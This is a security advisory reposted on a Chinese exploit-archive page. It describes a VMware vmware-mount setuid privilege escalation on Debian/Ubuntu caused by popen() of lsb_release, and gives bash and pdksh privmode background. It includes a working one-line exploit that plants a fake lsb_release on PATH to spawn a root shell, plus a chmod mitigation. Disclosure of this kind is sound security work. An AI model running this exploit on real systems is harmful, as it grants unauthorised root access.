首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0
来源:vfocus.net 作者:Ormandy 发布时间:2016-07-28  
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.
 
 488
 489   if (running_setuid && privileged_mode == 0)
 490     disable_priv_mode ();
 491
 
Where disable_priv_mode is defined as:
 
1202 void
1203 disable_priv_mode ()
1204 {
1205   setuid (current_user.uid);
1206   setgid (current_user.gid);
1207   current_user.euid = current_user.uid;
1208   current_user.egid = current_user.gid;
1209 }
 
Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:
 
 307     /* Turning off -p? */
 308     if (f == FPRIVILEGED && oldval && !newval) {
 309 #ifdef OS2
 310         ;
 311 #else /* OS2 */
 312         setuid(ksheuid = getuid());
 313         setgid(getgid());
 314 #endif /* OS2 */
 315     } else if (f == FPOSIX && newval) {
 
 
This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.
 
However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:
 
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
 
A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:
 
$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
 
It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).
 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
 
VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:
 
# chmod u-s /usr/bin/vmware-mount
 
Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.
 
In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)
 
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AXIS Authenticated Remote Comm
·Zortam Media Studio 20.60 Buff
·Centreon 2.5.3 - Web Useralias
·Barracuda Web App Firewall/Loa
·Barracuda Web App Firewall 8.0
·VUPlayer 2.49 - (.pls) Stack B
·Bellini/Supercook Wi-Fi Yumi S
·Drupal Module Coder < 7.x-1.3
·Technicolor TC7200 Modem/Route
·Easy File Sharing Web Server 7
·Ubee EVW3226 Modem/Router 1.0.
·AppArmor securityfs < 4.8 - aa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved